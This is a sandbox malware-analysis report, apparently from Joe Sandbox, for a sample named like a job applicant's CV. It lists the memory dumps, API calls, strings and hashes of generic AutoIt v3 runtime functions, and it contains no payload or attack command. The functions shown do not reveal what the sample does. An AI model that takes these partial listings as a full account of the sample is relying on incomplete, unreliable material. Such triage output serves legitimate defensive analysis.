SetUnhandledExceptionFilter.KERNEL32(?), ref: 0031818F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3a6b70ca6c3a1c1d3409c7cfa7c666d1fb04e7277e9039e1796afe0aa089bd88
Instruction ID: 200fcecd5e50660e20e994386c93a2a16b6bf64fcf77a818dde7af5811bcb362
Opcode Fuzzy Hash: 3a6b70ca6c3a1c1d3409c7cfa7c666d1fb04e7277e9039e1796afe0aa089bd88
Instruction Fuzzy Hash: 20A0113000020CAB8F022B82EC088883FACEA002A0B000020F80C080208B22A8A0AAA2

Function 002F93F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d4903f8c99ed964cb6178f79cd6fc17aa097157c120e425800bcebb6dceaf30
Instruction ID: aec5067d7f4a5f5b26c89a8c94941464b1ef605ef0e2399d81d0ff5a8c7c120c
Opcode Fuzzy Hash: 0d4903f8c99ed964cb6178f79cd6fc17aa097157c120e425800bcebb6dceaf30
Instruction Fuzzy Hash: 2C12AD70A006099FDF05DFA4D981ABEF7F9FF48340F108529E906E7254EB36A960CB50

Function 002FE3E3 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c80386a47ac4a1262f3330256143f91ad7880e7eb2b0ca9a62555f925f4c09a
Instruction ID: 60b03602bd46961acf772a2b5cee293034551e6695661d86a03aa5e4cde75e2f
Opcode Fuzzy Hash: 6c80386a47ac4a1262f3330256143f91ad7880e7eb2b0ca9a62555f925f4c09a
Instruction Fuzzy Hash: 1E12BD7092020A8FDF26DF58C490ABEF7B1FF14344F168079DA469B361E371A991CB91

Function 002FAF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 93a101934cf99cab809629a9926e51b5962fdd8096510143c31f44d5f81f2960
Instruction ID: 49b7067c72825d6c6deacf6059d1d17e34020ba83a1dc15a6d4f9db57973eb9f
Opcode Fuzzy Hash: 93a101934cf99cab809629a9926e51b5962fdd8096510143c31f44d5f81f2960
Instruction Fuzzy Hash: 6102AE70A10109DFCF16DF68D991ABFB7B9EF44340F118069E90ADB295EB31DA24CB91

Function 003102A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: a4af3b9950ad924dd571dc6b8a69908e426440a2126c95f8aac2c4d759407595
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 66C1B3362061930EDF2F463AC47447EBAA15AA27F531B076DD8B3CB8D5EF60C5A4D620

Function 003106D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: dd146161e5c02c223f2747add91fe183528539f5308975b17d0b28e1ca263954
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 7BC1B43220A1930EDF6F4639C43447EBAA15EA2BB531B076DD4B3CB8D5EF60D5A4D620

Function 0030FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: f555c7629aa72a4cf0233841153320baad5d8074c88f28c5cf5a3a6725799b46
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 85C1703220A1930EDF3E8639C47453EBAA15AA2BB531B077DD4B2CB9D5EF20D564D620

Function 0034A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0034A2FE
DeleteObject.GDI32(00000000), ref: 0034A310
DestroyWindow.USER32 ref: 0034A31E
GetDesktopWindow.USER32 ref: 0034A338
GetWindowRect.USER32(00000000), ref: 0034A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0034A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0034A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0034A4D8
GetClientRect.USER32(00000000,?), ref: 0034A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0034A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0034A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0034A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0034A55E
GlobalLock.KERNEL32(00000000), ref: 0034A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0034A576
GlobalUnlock.KERNEL32(00000000), ref: 0034A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0034A586
GlobalFree.KERNEL32(00000000), ref: 0034A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0034A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0037D9BC,00000000), ref: 0034A5B9
GlobalFree.KERNEL32(00000000), ref: 0034A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0034A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0034A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0034A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0034A81D

Strings

AutoIt v3, xrefs: 0034A4D0
static, xrefs: 0034A518, 0034A66F
, xrefs: 0034A7A3
DISPLAY, xrefs: 0034A680

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a6af6972bbb9f2dbe737dfc45105b74e70ec6373cc1d8f6d93b556da5b8d5107
Instruction ID: ca0a9c03d48445b7ff8ba779ddbbf5777bfdb020238621e92a5046357d0785d4
Opcode Fuzzy Hash: a6af6972bbb9f2dbe737dfc45105b74e70ec6373cc1d8f6d93b556da5b8d5107
Instruction Fuzzy Hash: BF026D75900118AFDB25DFA4CD89EAEBBB9FF48310F108158F909AB2A1D770AD41CF60

Function 0035D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0035D2DB
GetSysColorBrush.USER32(0000000F), ref: 0035D30C
GetSysColor.USER32(0000000F), ref: 0035D318
SetBkColor.GDI32(?,000000FF), ref: 0035D332
SelectObject.GDI32(?,00000000), ref: 0035D341
InflateRect.USER32(?,000000FF,000000FF), ref: 0035D36C
GetSysColor.USER32(00000010), ref: 0035D374
CreateSolidBrush.GDI32(00000000), ref: 0035D37B
FrameRect.USER32(?,?,00000000), ref: 0035D38A
DeleteObject.GDI32(00000000), ref: 0035D391
InflateRect.USER32(?,000000FE,000000FE), ref: 0035D3DC
FillRect.USER32(?,?,00000000), ref: 0035D40E
GetWindowLongW.USER32(?,000000F0), ref: 0035D439

Part of subcall function 0035D575: GetSysColor.USER32(00000012), ref: 0035D5AE
Part of subcall function 0035D575: SetTextColor.GDI32(?,?), ref: 0035D5B2
Part of subcall function 0035D575: GetSysColorBrush.USER32(0000000F), ref: 0035D5C8
Part of subcall function 0035D575: GetSysColor.USER32(0000000F), ref: 0035D5D3
Part of subcall function 0035D575: GetSysColor.USER32(00000011), ref: 0035D5F0
Part of subcall function 0035D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0035D5FE
Part of subcall function 0035D575: SelectObject.GDI32(?,00000000), ref: 0035D60F
Part of subcall function 0035D575: SetBkColor.GDI32(?,00000000), ref: 0035D618
Part of subcall function 0035D575: SelectObject.GDI32(?,?), ref: 0035D625
Part of subcall function 0035D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0035D644
Part of subcall function 0035D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0035D65B
Part of subcall function 0035D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0035D670
Part of subcall function 0035D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0035D698

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 99822c6941f501906391ae6873eed9e9f91d57fc5f24bf05a3874d3ff5b71e9c
Instruction ID: c580d64403ea364b4bdab27295556c01d6be7dccb6b0ae97972c3c24b1b6d540
Opcode Fuzzy Hash: 99822c6941f501906391ae6873eed9e9f91d57fc5f24bf05a3874d3ff5b71e9c
Instruction Fuzzy Hash: EA918D72408305AFCB229F64DC08E6B7BBDFF89325F100A19F96A961E0D771D984CB52

Function 0030B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0030B98B
DeleteObject.GDI32(00000000), ref: 0030B9CD
DeleteObject.GDI32(00000000), ref: 0030B9D8
DestroyIcon.USER32(00000000), ref: 0030B9E3
DestroyWindow.USER32(00000000), ref: 0030B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 0036D2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0036D2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0036D711

Part of subcall function 0030B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0030B759,?,00000000,?,?,?,?,0030B72B,00000000,?), ref: 0030BA58

SendMessageW.USER32 ref: 0036D758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0036D76F
ImageList_Destroy.COMCTL32(00000000), ref: 0036D785
ImageList_Destroy.COMCTL32(00000000), ref: 0036D790

Strings

0, xrefs: 0036D5A5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: e2896350fb2c2b3f20e32a27279b7a7c1e77a75c9a34ff17b9332d4d03b347ba
Instruction ID: 95f449dc42f76f645a7595bbf1eb4d6d3710ba55ee294f9f1131cff48ad75fd6
Opcode Fuzzy Hash: e2896350fb2c2b3f20e32a27279b7a7c1e77a75c9a34ff17b9332d4d03b347ba
Instruction Fuzzy Hash: 0E12A030A05201DFDB22CF18C894BA9BBF5FF45304F558569E989DB6A6CB31EC81CB91

Function 0033DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0033DBD6
GetDriveTypeW.KERNEL32(?,0038DC54,?,\\.\,0038DC00), ref: 0033DCC3
SetErrorMode.KERNEL32(00000000,0038DC54,?,\\.\,0038DC00), ref: 0033DE29

Strings

Removable, xrefs: 0033DD15
ATAPI, xrefs: 0033DD9A
SSA, xrefs: 0033DDAF
CDROM, xrefs: 0033DCF7
Virtual, xrefs: 0033DDEE
PhysicalDrive, xrefs: 0033DC67
SSD, xrefs: 0033DD50
SAS, xrefs: 0033DDD2
Fixed, xrefs: 0033DD0B
USB, xrefs: 0033DDBD
SATA, xrefs: 0033DDD9
Fibre, xrefs: 0033DDB6
Unknown, xrefs: 0033DCE3, 0033DD8C
iSCSI, xrefs: 0033DDCB
Network, xrefs: 0033DD01
FileBackedVirtual, xrefs: 0033DDF5
1394, xrefs: 0033DDA8
ATA, xrefs: 0033DDA1
RAMDisk, xrefs: 0033DCED
RAID, xrefs: 0033DDC4
\\.\, xrefs: 0033DC2B
MMC, xrefs: 0033DDE7
SCSI, xrefs: 0033DD93

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 0398eae4a8342560df9f7820d9f3e48dba340337ea9324a213a67905fd24a003
Instruction ID: 64b9b0c91593a26c39d31335dff6e9183c47131a7a23b4b8518d2316e026e0e6
Opcode Fuzzy Hash: 0398eae4a8342560df9f7820d9f3e48dba340337ea9324a213a67905fd24a003
Instruction Fuzzy Hash: A451C230248306ABC313EF10E8D28B9F7A9FF95B44F205A29F0079B6A1CB70D955DB52

Function 002FCC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 002FCC68
__wcsnicmp.LIBCMT ref: 002FCC80
__wcsnicmp.LIBCMT ref: 002FCC98
__wcsnicmp.LIBCMT ref: 002FCCB0
__wcsnicmp.LIBCMT ref: 002FCCC8
__wcsnicmp.LIBCMT ref: 002FCCE0
__wcsnicmp.LIBCMT ref: 002FCCF8
__wcsnicmp.LIBCMT ref: 002FCD0C
__wcsnicmp.LIBCMT ref: 002FCD4D
__wcsnicmp.LIBCMT ref: 002FCD61
__wcsnicmp.LIBCMT ref: 002FCD75
__wcsnicmp.LIBCMT ref: 002FCD89

Strings

#comments-end, xrefs: 002FCD6F
Unterminated group of comments, xrefs: 00362FB4
#include-once, xrefs: 002FCCC2
#OnAutoItStartRegister, xrefs: 002FCCAA
Bad directive syntax error, xrefs: 00362ECB
#cs, xrefs: 002FCD06, 002FCD5B
#notrayicon, xrefs: 002FCC7A
#pragma compile, xrefs: 002FCC62
Cannot parse #include, xrefs: 00362FA1
#ce, xrefs: 002FCD83
#include, xrefs: 002FCCDA
#comments-start, xrefs: 002FCCF2, 002FCD47
#requireadmin, xrefs: 002FCC92

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 43806dce027dd3eb782fadf2fd13673c21a1c2ecdf57902e826745605b1c59bf
Instruction ID: dfccd22e20215b72f97e860e596b60a92d1c7fc7f5b80f3a01b2fe0e24a6c948
Opcode Fuzzy Hash: 43806dce027dd3eb782fadf2fd13673c21a1c2ecdf57902e826745605b1c59bf
Instruction Fuzzy Hash: 7681183065020DAACB26BE64CD42FFFB768AF15380F158035FA05AE1CAEB61D965C690

Function 0035638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0038DC00), ref: 00356449

Strings

TABRIGHT, xrefs: 003564BD
ADDSTRING, xrefs: 00356536
ISENABLED, xrefs: 0035648C
SELECTSTRING, xrefs: 00356626
SHOWDROPDOWN, xrefs: 00356500
CHECK, xrefs: 0035668B
ISVISIBLE, xrefs: 00356455
GETCURRENTSELECTION, xrefs: 00356603
EDITPASTE, xrefs: 0035675B
TABLEFT, xrefs: 003564A7
SETCURRENTSELECTION, xrefs: 003565D6
DELSTRING, xrefs: 00356569
CURRENTTAB, xrefs: 003564DD
SENDCOMMANDID, xrefs: 003567CA
HIDEDROPDOWN, xrefs: 00356520
GETLINECOUNT, xrefs: 003566E4
GETSELECTED, xrefs: 003566C1
GETCURRENTLINE, xrefs: 00356704
UNCHECK, xrefs: 003566A1
FINDSTRING, xrefs: 00356596
GETCURRENTCOL, xrefs: 00356724
GETLINE, xrefs: 0035678B
ISCHECKED, xrefs: 00356659

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 818e169958f64edd557508f3b9c42af910c09d4f8bf3d51beaf83b4ba50fb34b
Instruction ID: 4e083028084b5ef39879a73067051c99660d03a763d14ff7ed2d84c248486964
Opcode Fuzzy Hash: 818e169958f64edd557508f3b9c42af910c09d4f8bf3d51beaf83b4ba50fb34b
Instruction Fuzzy Hash: 4BC1AF342042458BCB06EF10C562E6EB7A9AF95345F50486CFC965F2F2DB21ED4ECB82

Function 0035D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0035D5AE
SetTextColor.GDI32(?,?), ref: 0035D5B2
GetSysColorBrush.USER32(0000000F), ref: 0035D5C8
GetSysColor.USER32(0000000F), ref: 0035D5D3
CreateSolidBrush.GDI32(?), ref: 0035D5D8
GetSysColor.USER32(00000011), ref: 0035D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0035D5FE
SelectObject.GDI32(?,00000000), ref: 0035D60F
SetBkColor.GDI32(?,00000000), ref: 0035D618
SelectObject.GDI32(?,?), ref: 0035D625
InflateRect.USER32(?,000000FF,000000FF), ref: 0035D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0035D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 0035D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0035D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0035D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 0035D6DD
DrawFocusRect.USER32(?,?), ref: 0035D6E8
GetSysColor.USER32(00000011), ref: 0035D6F6
SetTextColor.GDI32(?,00000000), ref: 0035D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0035D712
SelectObject.GDI32(?,0035D2A5), ref: 0035D729
DeleteObject.GDI32(?), ref: 0035D734
SelectObject.GDI32(?,?), ref: 0035D73A
DeleteObject.GDI32(?), ref: 0035D73F
SetTextColor.GDI32(?,?), ref: 0035D745
SetBkColor.GDI32(?,?), ref: 0035D74F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
